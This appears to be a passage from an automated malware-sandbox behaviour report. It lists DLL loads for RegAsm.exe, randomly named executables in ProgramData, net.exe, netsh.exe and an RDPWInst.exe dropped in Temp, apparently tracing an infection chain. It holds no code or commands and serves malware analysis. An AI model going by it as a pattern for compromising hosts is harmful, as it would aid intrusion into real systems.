Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\GIEHJDHCBA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\BKKFCFBKFC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: version.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: wldp.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: amsi.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: userenv.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: profapi.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: rasman.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\CFHIIEHJKK.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
